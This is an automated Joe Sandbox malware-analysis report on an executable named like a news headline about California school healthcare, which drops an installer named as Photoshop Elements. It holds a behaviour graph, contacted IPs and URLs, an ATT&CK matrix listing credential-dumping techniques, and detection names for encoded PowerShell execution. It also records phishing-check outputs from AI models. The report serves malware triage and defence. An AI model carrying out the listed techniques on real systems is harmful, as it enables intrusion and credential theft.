Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Disable or Modify Tools
NTDS1
Process Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
Process Injection
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
Obfuscated Files or Information
Cached Domain Credentials2
System Owner/User Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Software Packing
DCSync2
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc Filesystem44
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
File Deletion
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1555371 Sample: Must-School-Districts-In-Ca... Startdate: 13/11/2024 Architecture: WINDOWS Score: 52 81 Sigma detected: PowerShell Base64 Encoded IEX Cmdlet 2->81 83 Sigma detected: Suspicious Script Execution From Temp Folder 2->83 9 Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe 2 2->9         started        12 svchost.exe 2->12         started        process3 dnsIp4 55 Must-School-Distri...e-For-Employees.tmp, PE32 9->55 dropped 16 Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp 3 17 9->16         started        79 127.0.0.1 unknown unknown 12->79 57 neifaoindggfcjicff...e5nzhtm.crx3 (copy), Google 12->57 dropped 87 Writes many files with high entropy 12->87 file5 signatures6 process7 file8 41 C:\...\PhotoshopElements_2024_LS30_win64.exe, PE32 16->41 dropped 43 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 16->43 dropped 45 C:\...\PhotoshopElements_2024_LS30_win64.exe, PE32 16->45 dropped 19 PhotoshopElements_2024_LS30_win64.exe 16->19         started        24 powershell.exe 16->24         started        process9 dnsIp10 67 3.211.174.17 AMAZON-AESUS United States 19->67 69 44.209.177.127 AMAZON-AESUS United States 19->69 71 2 other IPs or domains 19->71 47 05_PSE2024_Install...l_NewUI_445x239.png, PNG 19->47 dropped 49 05_PSE2024_Install...CallOut_445x239.png, PNG 19->49 dropped 51 04_PSE2024_Install...lection_445x239.png, PNG 19->51 dropped 53 16 other malicious files 19->53 dropped 85 Writes many files with high entropy 19->85 26 chrome.exe 19->26         started        30 PhotoshopElements_2024_LS30_win64.exe 19->30         started        32 conhost.exe 24->32         started        file11 signatures12 process13 dnsIp14 73 192.168.2.4 unknown unknown 26->73 75 192.168.2.5 unknown unknown 26->75 77 239.255.255.250 unknown Reserved 26->77 59 C:\Windows\...behaviorgraphoogle.Widevine.CDM.dll, PE32+ 26->59 dropped 34 chrome.exe 26->34         started        37 chrome.exe 26->37         started        39 chrome.exe 26->39         started        file15 process16 dnsIp17 61 63.140.62.222 OMNITUREUS United States 34->61 63 63.140.62.27 OMNITUREUS United States 34->63 65 7 other IPs or domains 34->65

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe5%ReversingLabs
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\PhotoshopElements_2024_LS30_win64.exe3%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp5%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe3%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping8016_1807591881\Google.Widevine.CDM.dll0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://ims-na1-stg1.adobelogin.com0%Avira URL Cloudsafe
https://ims-na1-stg1.adobelogin.com/imsj.prod0%Avira URL Cloudsafe
https://delegated-stage-or2.stage.cloud.adobe.0%Avira URL Cloudsafe
https://ims-na1-stg1.adobelogin.com/ims0%Avira URL Cloudsafe
https://delegated.adobelogin.comity0%Avira URL Cloudsafe
https://ims-prod07.adobelogin.comBaseUserProfilep8e-xo88uZdECZX33TmXbouglqWnMMEOY-gsf43446bc-7009-410%Avira URL Cloudsafe
https://ims-prod06.adobelogin.comcb0%Avira URL Cloudsafe
http://crl3.digic0%Avira URL Cloudsafe
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http://typekit.com/eulas/000000000000000000014f51liPhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1318073315.00000000053CA000.00000004.00000020.00020000.00000000.sdmpfalse
    high
    https://ims-prod06.adobelogin.comPhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755604634.0000000001377000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpfalse
      high
      https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUMust-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exefalse
        high
        https://ims-na1-stg1.adobelogin.comPhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://ims-na1-stg1.adobelogin.com/imsPhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3762015475.0000000005C35000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://typekit.com/eulas/000000000000000000014825PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.drfalse
          high
          http://typekit.com/eulas/000000000000000000014824PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.drfalse
            high
            http://typekit.com/eulas/000000000000000000014823PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.drfalse
              high
              http://typekit.com/eulas/000000000000000000014822PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.drfalse
                high
                https://delegated-stage-or2.stage.cloud.adobe.PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3775857049.000000000C8C3000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000E.00000003.1328046176.000001BDA3400000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://crl.ver)svchost.exe, 0000000E.00000002.3754901379.000001BD9DCBF000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://ims-prod07.adobelogin.comPhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755604634.000000000132D000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://ims-prod06.adobelogin.comcbPhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755604634.0000000001377000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://github.com/WebReflection/url-search-params/blob/master/README.md#ios-10--other-platforms-bugchromecache_240.18.drfalse
                        high
                        https://ims-na1.adobelogin.com/ims/authorize/v3?client_id=CC_HD_ESD_5_2&response_type=device&hashed_PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763291568.0000000006250000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3758086632.0000000004710000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763657703.0000000006F0E000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765673238.0000000009867000.00000004.00000020.00020000.00000000.sdmp, HDInstaller.log.10.drfalse
                          high
                          https://delegated.adobelogin.com/(PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763050320.0000000006167000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://ims-na1.adobelogin.com/ims/authorize?client_id=CC_HD_ESD_WEB&amp;amp;scope=allow_ac_dt_exchaPhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765274666.0000000009700000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755388883.0000000001250000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://typekit.com/eulas/000000000000000000014f4dQ;PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1339572054.0000000005418000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1339416416.00000000053E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://typekit.com/eulas/000000000000000000014f4ePhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.drfalse
                                  high
                                  http://typekit.com/eulas/000000000000000000014f4dPhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1339572054.0000000005418000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763291568.0000000006250000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1339416416.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3764681817.0000000009232000.00000004.00000800.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765673238.0000000009A39000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.drfalse
                                    high
                                    https://g.live.com/odclientsettings/Prod1C:svchost.exe, 0000000E.00000003.1328046176.000001BDA3459000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.remobjects.com/psMust-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe, 00000000.00000003.1273556329.000000007FB40000.00000004.00001000.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe, 00000000.00000003.1272470718.0000000002550000.00000004.00001000.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000000.1274939932.0000000000401000.00000020.00000001.01000000.00000005.sdmpfalse
                                        high
                                        http://typekit.com/eulas/000000000000000000014f4fdfltPhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1339827960.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1340065858.0000000005418000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://ims-na1.adobelogin.com/ims/authorize?client_id=CC_HD_ESD_WEB&scope=allow_ac_dt_exchange%2CopPhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765673238.0000000009867000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://www.innosetup.com/Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe, 00000000.00000003.1273556329.000000007FB40000.00000004.00001000.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe, 00000000.00000003.1272470718.0000000002550000.00000004.00001000.00020000.00000000.sdmp, Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp, 00000005.00000000.1274939932.0000000000401000.00000020.00000001.01000000.00000005.sdmpfalse
                                              high
                                              http://typekit.com/eulas/000000000000000000014f4fPhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1340892950.0000000005418000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1340316690.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1339827960.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1340065858.0000000005418000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763657703.00000000068F0000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3764681817.0000000009232000.00000004.00000800.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765673238.0000000009A39000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.drfalse
                                                high
                                                https://delegated.adobelogin.comityPhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755604634.00000000012CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://crl3.digicPhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3754181753.00000000012BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://use.typekit.net/af/c2b3ac/0000000000000000000176ff/27/l?unicode=AAAIKgAAAAeBbOxmgCK-MdR34PEMindex.html0.10.dr, index.html.10.drfalse
                                                  high
                                                  http://www.winimage.com/zLibDllPhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpfalse
                                                    high
                                                    https://ims-na1-stg1.adobelogin.com/imsj.prodPhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3775857049.000000000C8C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://typekit.com/eulas/000000000000000000014f52PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.drfalse
                                                      high
                                                      http://typekit.com/eulas/000000000000000000014f51PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1340892950.0000000005418000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1340316690.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763657703.00000000068F0000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3764681817.0000000009232000.00000004.00000800.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765673238.0000000009A39000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.drfalse
                                                        high
                                                        https://ims-prod07.adobelogin.comBaseUserProfilep8e-xo88uZdECZX33TmXbouglqWnMMEOY-gsf43446bc-7009-41PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://typekit.com/eulas/000000000000000000014f50PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1311681987.0000000005EEB000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000003.1336189385.000000000C3D5000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3743552926.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3764681817.0000000009232000.00000004.00000800.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763657703.0000000006CB0000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3765673238.0000000009A39000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmp, clean.css.10.drfalse
                                                          high
                                                          https://ims-na1.adobelogin.com/ims/authorize?client_id=CC_HD_ESD_WEB&amp;scope=allow_ac_dt_exchange%PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3763050320.0000000006167000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3755388883.0000000001250000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3757122196.0000000003B03000.00000004.00000020.00020000.00000000.sdmp, PhotoshopElements_2024_LS30_win64.exe, 0000000A.00000002.3757122196.0000000003B00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            18.239.50.31
                                                            unknownUnited States
                                                            16509AMAZON-02USfalse
                                                            18.155.129.16
                                                            unknownUnited States
                                                            16509AMAZON-02USfalse
                                                            63.140.62.27
                                                            unknownUnited States
                                                            15224OMNITUREUSfalse
                                                            63.140.62.222
                                                            unknownUnited States
                                                            15224OMNITUREUSfalse
                                                            142.250.186.132
                                                            unknownUnited States
                                                            15169GOOGLEUSfalse
                                                            3.211.174.17
                                                            unknownUnited States
                                                            14618AMAZON-AESUSfalse
                                                            46.137.47.185
                                                            unknownIreland
                                                            16509AMAZON-02USfalse
                                                            1.1.1.1
                                                            unknownAustralia
                                                            13335CLOUDFLARENETUSfalse
                                                            54.70.159.128
                                                            unknownUnited States
                                                            16509AMAZON-02USfalse
                                                            52.215.4.125
                                                            unknownUnited States
                                                            16509AMAZON-02USfalse
                                                            239.255.255.250
                                                            unknownReserved
                                                            unknownunknownfalse
                                                            13.32.47.160
                                                            unknownUnited States
                                                            16509AMAZON-02USfalse
                                                            44.209.177.127
                                                            unknownUnited States
                                                            14618AMAZON-AESUSfalse
                                                            18.245.60.46
                                                            unknownUnited States
                                                            16509AMAZON-02USfalse
                                                            IP
                                                            192.168.2.4
                                                            192.168.2.5
                                                            127.0.0.1
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1555371
                                                            Start date and time:2024-11-13 19:52:32 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 11m 36s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:25
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe
                                                            Detection:MAL
                                                            Classification:mal52.rans.evad.winEXE@35/256@0/17
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:Failed
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Override analysis time to 240s for powershell
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 3.248.26.100, 54.77.72.255, 54.74.179.44, 2.16.238.136, 2.16.238.153, 192.168.2.7, 54.195.71.107, 34.250.67.152, 54.194.243.238, 184.28.90.27, 199.232.214.172, 172.66.0.163, 162.159.140.165, 142.250.185.67, 142.250.185.78, 64.233.167.84, 104.18.32.77, 172.64.155.179, 34.104.35.123, 2.19.126.206, 2.19.126.198, 2.16.168.10, 2.16.168.6, 52.72.164.124, 18.213.158.126, 142.250.185.74, 216.58.206.42, 142.250.185.170, 172.217.18.106, 172.217.23.106, 142.250.184.234, 142.250.185.138, 142.250.185.106, 142.250.185.202, 142.250.185.234, 142.250.186.74, 216.58.206.74, 142.250.181.234, 142.250.186.42, 142.250.184.202, 142.250.186.138, 142.250.181.238, 2.19.126.208, 2.19.126.218, 142.250.186.110, 142.250.186.163, 142.250.186.142, 142.250.184.227
                                                            • Excluded domains from analysis (whitelisted): ims-na1.adobelogin.com.cdn.cloudflare.net, auth.services.adobe.com, slscr.update.microsoft.com, delegated-va6.cloud.adobe.io, resources.licenses.adobe.com, clientservices.googleapis.com, time.windows.com, na1e-uw.services.adobe.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, server.messaging.adobe.com, a1874.dscg1.akamai.net, clients2.google.com, delegated.identity.adobe.com, use-stls.adobe.com.edgesuite.net, redirector.gvt1.com, ocsps.ssl.com, e16604.g.akamaiedge.net, update.googleapis.com, lcs-cops.adobe.io, prod.fs.microsoft.com.akadns.net, clients1.google.com, sstats.adobe.com, delegated-va6-hardfail.identity.adobe.com, fs.microsoft.com, stls.adobe.com-cn.edgesuite.net.globalredir.akadns.net, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, ctldl.windowsupdate.com, na1e-acc.services.adobe.com, cc-api-data.adobe.io, stls.adobe.com-cn.edgesuite.net, fe3cr.delivery.mp.microsof
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • VT rate limit hit for: Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe
                                                            TimeTypeDescription
                                                            13:53:33API Interceptor8343x Sleep call for process: PhotoshopElements_2024_LS30_win64.exe modified
                                                            13:53:35API Interceptor2x Sleep call for process: svchost.exe modified
                                                            InputOutput
                                                            URL: https://auth.services.adobe.com/en_US/deeplink.html?deeplink=ssofirst&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCC_HD_ESD_WEB%2FAdobeID%2Fcode%3Fredirect_uri%3Dhttps%253A%252F%252Fauth.services.adobe.com%252Fen_US%252Fdeeplink.html%2 Model: claude-3-haiku-20240307
                                                            ```json
                                                            {
                                                              "contains_trigger_text": true,
                                                              "trigger_text": "Sign in",
                                                              "prominent_button_name": "Continue",
                                                              "text_input_field_labels": [
                                                                "Email address"
                                                              ],
                                                              "pdf_icon_visible": false,
                                                              "has_visible_captcha": false,
                                                              "has_urgent_text": false,
                                                              "has_visible_qrcode": false
                                                            }
                                                            URL: Model: claude-3-5-sonnet-latest
                                                            {
                                                                "typosquatting": false,
                                                                "unusual_query_string": false,
                                                                "suspicious_tld": false,
                                                                "ip_in_url": false,
                                                                "long_subdomain": false,
                                                                "malicious_keywords": false,
                                                                "encoded_characters": false,
                                                                "redirection": false,
                                                                "contains_email_address": false,
                                                                "known_domain": true,
                                                                "brand_spoofing_attempt": false,
                                                                "third_party_hosting": false
                                                            }
                                                            URL: https://auth.services.adobe.com
                                                            URL: https://auth.services.adobe.com/en_US/deeplink.html?deeplink=ssofirst&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCC_HD_ESD_WEB%2FAdobeID%2Fcode%3Fredirect_uri%3Dhttps%253A%252F%252Fauth.services.adobe.com%252Fen_US%252Fdeeplink.html%2 Model: claude-3-haiku-20240307
                                                            ```json
                                                            {
                                                              "brands": [
                                                                "Adobe"
                                                              ]
                                                            }
                                                            URL: https://auth.services.adobe.com/en_US/deeplink.html?deeplink=ssofirst&callback=https%3A%2F%2Fims-na1.adobelogin.com%2Fims%2Fadobeid%2FCC_HD_ESD_WEB%2FAdobeID%2Fcode%3Fredirect_uri%3Dhttps%253A%252F%252Fauth.services.adobe.com%252Fen_US%252Fdeeplink.html%2 Model: gpt-4o
